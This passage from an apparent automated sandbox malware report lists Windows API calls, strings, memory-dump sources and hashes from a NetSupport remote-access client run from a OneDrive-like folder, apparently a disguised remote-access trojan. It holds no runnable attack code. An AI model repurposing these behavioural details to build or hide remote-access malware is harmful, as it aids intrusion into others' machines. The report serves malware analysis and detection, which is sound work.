                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7774C3F0,00000000,?,11103735,111032D0,00000001,00000000), ref: 11102717
                                                        • CreateThread.KERNEL32(00000000,11103735,00000001,00000000,00000000,0000000C), ref: 1110273A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102767
                                                        • CloseHandle.KERNEL32(?,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102771
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                        • String ID: ..\ctl32\Refcount.cpp$hThread
                                                        • API String ID: 3360349984-1136101629
                                                        • Opcode ID: 11b5fb0dee8cbdce21d593dae7f6460e58f7565787492cb323c1118e16b37232
                                                        • Instruction ID: 500c2b3c3357f9213b13d9fe8d1126e8dc21d1a7e49489592dffc9e6a9027773
                                                        • Opcode Fuzzy Hash: 11b5fb0dee8cbdce21d593dae7f6460e58f7565787492cb323c1118e16b37232
                                                        • Instruction Fuzzy Hash: 1C01717A7007116FE3218E95DC85F9BFBA8EB56764F108528FA15962C0D770E4058BB0
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\GraphicsDrivers\DCI,00000000,0002001F,?), ref: 1110946F
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 111094A7
                                                        • RegSetValueExA.ADVAPI32(00000000,Timeout,00000000,00000004,00000000,00000004), ref: 111094C3
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 111094CD
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseValue$OpenQuery
                                                        • String ID: System\CurrentControlSet\Control\GraphicsDrivers\DCI$Timeout
                                                        • API String ID: 3962714758-504756767
                                                        • Opcode ID: 593e1dd38c13c10e7a4daff4c42b3bccf59c301c76992b28c9cb3cfbd63388de
                                                        • Instruction ID: e2b4fe1a7407c51d3679897667db751a92ae8154eaac79b11ee734c705fb4573
                                                        • Opcode Fuzzy Hash: 593e1dd38c13c10e7a4daff4c42b3bccf59c301c76992b28c9cb3cfbd63388de
                                                        • Instruction Fuzzy Hash: 33019279B40209FFEB00EF90DD4AFAEF778AB44709F008045FE18A7184D6B0A614DBA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf
                                                        • String ID: %s%s%s.bin$494126$_HF$_HW$_SW
                                                        • API String ID: 2111968516-430959295
                                                        • Opcode ID: 5343a590b740c9c9738c92f8b8acd3bf342b6db108878fabbc709ed31f555550
                                                        • Instruction ID: c25928671520f454b92b43ec0ad7b42779770566938daa2e780b2e5a9d994659
                                                        • Opcode Fuzzy Hash: 5343a590b740c9c9738c92f8b8acd3bf342b6db108878fabbc709ed31f555550
                                                        • Instruction Fuzzy Hash: CBE09260D0420C2BF600A1488C05BDBBB9F1740399FC0C044BEABAA286FD249400869B
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 6C814FA1
                                                          • Part of subcall function 6C8161A0: _memset.LIBCMT ref: 6C8161BF
                                                          • Part of subcall function 6C8161A0: _strncpy.LIBCMT ref: 6C8161CB
                                                          • Part of subcall function 6C808C00: EnterCriticalSection.KERNEL32(6C849898,?,?,00000000,?,6C80C0C1,?,00000000), ref: 6C808C23
                                                          • Part of subcall function 6C808C00: InterlockedExchange.KERNEL32(?,00000000), ref: 6C808C88
                                                          • Part of subcall function 6C808C00: Sleep.KERNEL32(00000000,?,6C80C0C1,?,00000000), ref: 6C808C9E
                                                          • Part of subcall function 6C808C00: LeaveCriticalSection.KERNEL32(6C849898,00000000), ref: 6C808CD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                        • String ID: 1.2$Channel$Client$Publish %d pending services
                                                        • API String ID: 1112461860-1140593649
                                                        • Opcode ID: afeb91311d3ef3211a531bbd5da6b6790a90067503532aef1c584e6de41ca460
                                                        • Instruction ID: 5fdeb0a8509b6a8b6b89e4219af773b3e0a8cda93bf18bf3be81b68c3ca02318
                                                        • Opcode Fuzzy Hash: afeb91311d3ef3211a531bbd5da6b6790a90067503532aef1c584e6de41ca460
                                                        • Instruction Fuzzy Hash: F251CF30B083468FEB31EAA99F44BAA37F5AB1231CF248D39D451C6E81E7759148C7D2
                                                        APIs
                                                        • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110F61E3
                                                        • GetStockObject.GDI32(00000004), ref: 110F623B
                                                        • RegisterClassA.USER32(?), ref: 110F624F
                                                        • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00100000,00000000,00000000,00000000), ref: 110F628A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                        • String ID: NSMDesktopWnd
                                                        • API String ID: 2669163067-206650970
                                                        • Opcode ID: 173f293a3e361e7ef0e65a549ff519908d5edf4eb24d47ef909566306d25e691
                                                        • Instruction ID: 346a4b555008fa5bb99351eae23e3b1030b3e8e24f27a1909c2d26c4daee2dcd
                                                        • Opcode Fuzzy Hash: 173f293a3e361e7ef0e65a549ff519908d5edf4eb24d47ef909566306d25e691
                                                        • Instruction Fuzzy Hash: 0F31E5B5D05659AFCB40DFA9D884A9EFBF8FB09714F50862EE819E3244E7345900CB94
                                                        APIs
                                                          • Part of subcall function 6C818210: _strncpy.LIBCMT ref: 6C818234
                                                        • inet_addr.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6C805051
                                                        • gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6C805062
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6C80508D
                                                        Strings
                                                        • Cannot resolve hostname %s, error %d, xrefs: 6C805096
                                                        • Gateway_WebProxy, xrefs: 6C804FEA
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                         • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast_strncpygethostbynameinet_addr
                                                        • String ID: Cannot resolve hostname %s, error %d$Gateway_WebProxy
                                                        • API String ID: 2603238076-4066638241
                                                        • Opcode ID: 48722d780a63b1f606c47696aa235d67322c141eed464152551ff3cba1eef626
                                                        • Instruction ID: fb71b2fb066db2eb72145df06a0eec2b4730f70f8181b12f6a646caf712de4b7
                                                        • Opcode Fuzzy Hash: 48722d780a63b1f606c47696aa235d67322c141eed464152551ff3cba1eef626
                                                        • Instruction Fuzzy Hash: 1E21EA31A012199BDB30DB69CD40FDAB3F8EF45218F4089A9E949DB740EF759948CBE1
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111346D0
                                                        • RegCloseKey.ADVAPI32(?), ref: 11134734
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpen
                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                        • API String ID: 47109696-3245241687
                                                        • Opcode ID: 9d12ddab663f0bade2c9311f31fb996a2d55a49d3ba79c2b1d99accddb9a637b
                                                        • Instruction ID: 7a7cfa5f29f4a3e9be51cc667e7100b43bb54833ec5544d3ab887deb0b5b3a13
                                                        • Opcode Fuzzy Hash: 9d12ddab663f0bade2c9311f31fb996a2d55a49d3ba79c2b1d99accddb9a637b
                                                        • Instruction Fuzzy Hash: F9210AB9E5062ADBE721DE64CD80FDAF7B8AB85319F1041AAD81DF3244D630DD448BA0
                                                        APIs
                                                          • Part of subcall function 11104920: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110494A
                                                          • Part of subcall function 11104920: __wsplitpath.LIBCMT ref: 11104965
                                                          • Part of subcall function 11104920: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11104999
                                                        • GetComputerNameA.KERNEL32(?,?), ref: 11104A68
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                        • API String ID: 806825551-1858614750
                                                        • Opcode ID: 901a4ed7de8df71ce125f945868b5c0093e215064daac697b613a1a223286f3b
                                                        • Instruction ID: e7f9985d51565af38080bde2b7bad96e9363af9279f09dbbe9d4585dd592ed72
                                                        • Opcode Fuzzy Hash: 901a4ed7de8df71ce125f945868b5c0093e215064daac697b613a1a223286f3b
                                                        • Instruction Fuzzy Hash: 72214636E441859AE701CE709EC0BFFBFAADF85214F0481ACEC52C7502E726EA04C790
                                                        APIs
                                                          • Part of subcall function 11133070: GetCurrentProcess.KERNEL32(11027FDF,?,111332C3,?), ref: 1113307C
                                                          • Part of subcall function 11133070: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\MSOneDrive\client32.exe,00000104,?,111332C3,?), ref: 11133099
                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111336A5
                                                        • ResetEvent.KERNEL32(00000250), ref: 111336B9
                                                        • SetEvent.KERNEL32(00000250), ref: 111336CF
                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111336DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                        • String ID: MiniDump
                                                        • API String ID: 1494854734-2840755058
                                                        • Opcode ID: 6a23f2a9de3140760915938baa0324fa1df2816b93868bf2c807555fc190a424
                                                        • Instruction ID: 2f84af38c29f256cee2cc1ffc865d9f7da14dec3b61b68d8c3c8670bee4004e0
                                                        • Opcode Fuzzy Hash: 6a23f2a9de3140760915938baa0324fa1df2816b93868bf2c807555fc190a424
                                                        • Instruction Fuzzy Hash: D8112CB29242257FD700DBA89C85F9AF7989B44739F104234F924D73C8EA71E600CBB9
                                                        APIs
                                                        • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11135DCF
                                                        • wsprintfA.USER32 ref: 11135E06
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                        • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                        • API String ID: 1985783259-2296142801
                                                        • Opcode ID: 0eaf82f8904d0e89491818307a0e8bd6524ff2e2b8cd6c2dac824670f33672ca
                                                        • Instruction ID: 856d5068e0010e8f5460d586c9b7f9a33cbca200768314754285dae5934ecd8a
                                                        • Opcode Fuzzy Hash: 0eaf82f8904d0e89491818307a0e8bd6524ff2e2b8cd6c2dac824670f33672ca
                                                        • Instruction Fuzzy Hash: 9111E9FAD101296BC710DA65DD85F9AF76C9B84719F004164EF04B7149EA30AA0587A4
                                                        APIs
                                                        • _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • _memset.LIBCMT ref: 111028C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                        • API String ID: 3234921582-2664294811
                                                        • Opcode ID: d3963ed258874b49d6020dc6d10e6edddcef5a371903b28941bd5c66df2d9fea
                                                        • Instruction ID: 86aa9e5bcbae8f8c2bc6393a2fe4af4140ad48230e9cd7b97cb8b02b288cada0
                                                        • Opcode Fuzzy Hash: d3963ed258874b49d6020dc6d10e6edddcef5a371903b28941bd5c66df2d9fea
                                                        • Instruction Fuzzy Hash: 24F0F6BAE0012867C7109AA5AC41FDFF7AC9F82608F4000A9FE0467142EA70AB01CBE5
                                                        APIs
                                                        • wsprintfA.USER32 ref: 1102FD46
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                        • String ID: %s%s.bin$494126$clientinv.cpp$m_pDoInv == NULL
                                                        • API String ID: 4180936305-641825243
                                                        • Opcode ID: 5c7d3b0ce6cdb17c67caba4e79f62d2df26f4e5501008924e72aac950388db45
                                                        • Instruction ID: 34a2fd1cf9ce17e411a54b0388ef97a3e351311eb6f0b41dc2420f2fea7f0bd6
                                                        • Opcode Fuzzy Hash: 5c7d3b0ce6cdb17c67caba4e79f62d2df26f4e5501008924e72aac950388db45
                                                        • Instruction Fuzzy Hash: 022190B5E00709AFD710DF25CC80BABB7E5FB44758F10852DEC5597781EA34A8008B51
                                                        APIs
                                                        • GetFileAttributesA.KERNEL32(11134108,00000000,?,11134108,00000000), ref: 11133ADC
                                                        • __strdup.LIBCMT ref: 11133AF7
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                          • Part of subcall function 11133AC0: _free.LIBCMT ref: 11133B1E
                                                        • _free.LIBCMT ref: 11133B2C
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        • CreateDirectoryA.KERNEL32(11134108,00000000,?,?,?,11134108,00000000), ref: 11133B37
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                        • String ID:
                                                        • API String ID: 398584587-0
                                                        • Opcode ID: 003d8b81bd00a6845321ecaa249ead445a6f39f9a1119b8ade07daca962c11ae
                                                        • Instruction ID: aa2e0163475f2b812501e4eb99de98075b3d8b88882ce7cf24685a9f1b499ad4
                                                        • Opcode Fuzzy Hash: 003d8b81bd00a6845321ecaa249ead445a6f39f9a1119b8ade07daca962c11ae
                                                        • Instruction Fuzzy Hash: 8801F977B381125AF301157D6D06BBBBB898BC26BEF084131F81DC6388F656E40641AA
                                                        APIs
                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ED52
                                                          • Part of subcall function 1114F2A4: _setlocale.LIBCMT ref: 1114F2B6
                                                        • _free.LIBCMT ref: 1100ED64
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        • _free.LIBCMT ref: 1100ED77
                                                        • _free.LIBCMT ref: 1100ED8A
                                                        • _free.LIBCMT ref: 1100ED9D
